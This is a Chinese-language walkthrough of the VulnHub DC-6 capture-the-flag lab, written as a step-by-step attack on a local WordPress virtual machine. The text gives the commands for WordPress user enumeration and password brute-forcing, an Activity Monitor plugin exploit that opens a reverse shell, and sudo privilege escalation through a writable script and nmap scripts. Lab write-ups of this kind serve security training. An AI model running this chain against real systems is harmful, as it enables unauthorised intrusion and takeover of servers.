靶机DC-6下载地址: https://download.vulnhub.com/dc/DC-6.zip
环境:VMware 虚拟机软件
DC-6靶机IP地址:192.168.62.136
Kali的IP地址:192.168.62.135
使用nmap工具扫描192.168.62.0网段的存活主机,发现DC-6靶机的IP地址为192.168.62.136
使用nmap扫描靶机开放的端口,已开放端口有22(ssh)、80(http)
浏览器地址栏输入靶机IP地址,发现显示域名但无法解析域名导致无法访问网站
修改/etc/hosts文件,添加主机192.168.220.153 wordy
vim /etc/hosts
192.168.62.136 wordy
网站是WordPress的CMS,和DC-2一样,使用nikto工具扫描网站结构,发现登录页面wp-login.php和一个/wp-content/uploads目录
nikto -h wordy -o nikto-wordy.txt
打开后台登录页面
使用wpscan工具对wordpress网站扫描获取WordPress可以登录的用户
wpscan --url http://wordy/ -e u 暴力枚举用户名
爆破五个用户
admin、graham、mark、sarah、jens
我们现在得到用户名,再根据提示得到密码字典
更名为dc6password.txt
暴力破解用户名密码得到
(wpscan --url http://wordy/ -U dc6user.txt -P dc6password.txt)
账号Mark : 密码helpdesk01
登录wordpress后台,在后台发现activity monitor,查找相关漏洞
查找activity monitor插件存在的漏洞,并利用
searchsploit activity monitor
修改html代码action跳转及shell反弹IP地址到kali本机
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
cp45274.html 45274.html.bak
vim 45274.html
Kali临时开启HTTP服务,并访问45274.html页面
python -m SimpleHTTPServer 80
点击提交按钮
同时在kali监听9999端口,在页面点击submit request后,反弹shell成功
nc -lvvp 9999
切换shell外壳到交互式界面
python -c ‘import pty;pty.spawn("/bin/bash")’
进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现graham用户及登录密码
cd /home/mark/stuff
cat things-to-do.txt
使用su命令切换graham用户或者使用ssh服务登录graham用户
www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4
graham用户成功登录后,查看当前用户可以执行的操作,发现可以运行jens用户下面的backups.sh
查看backups.sh文件,发现是对web的文件进行打包备份
cat backups.sh
向backups.sh文件中写入”/bin/bash”,并以jens用户去执行该脚本
echo “/bin/bash” >> backups.sh
sudo -u jens ./backups.sh
脚本执行成功后,切换到jens用户,再次查看jens可以执行的操作,发现jens可以在无密码情况下使用nmap命令
百度到可以写入一条命令到getShell,并通过nmap运行getShell成功进入root用户,在/root目录下找到theflag.txt文件
- echo ‘os.execute("/bin/sh")’ > getShell
2 .sudo nmap --script=getShell - cd /root
- cat theflag.txt
靶机完成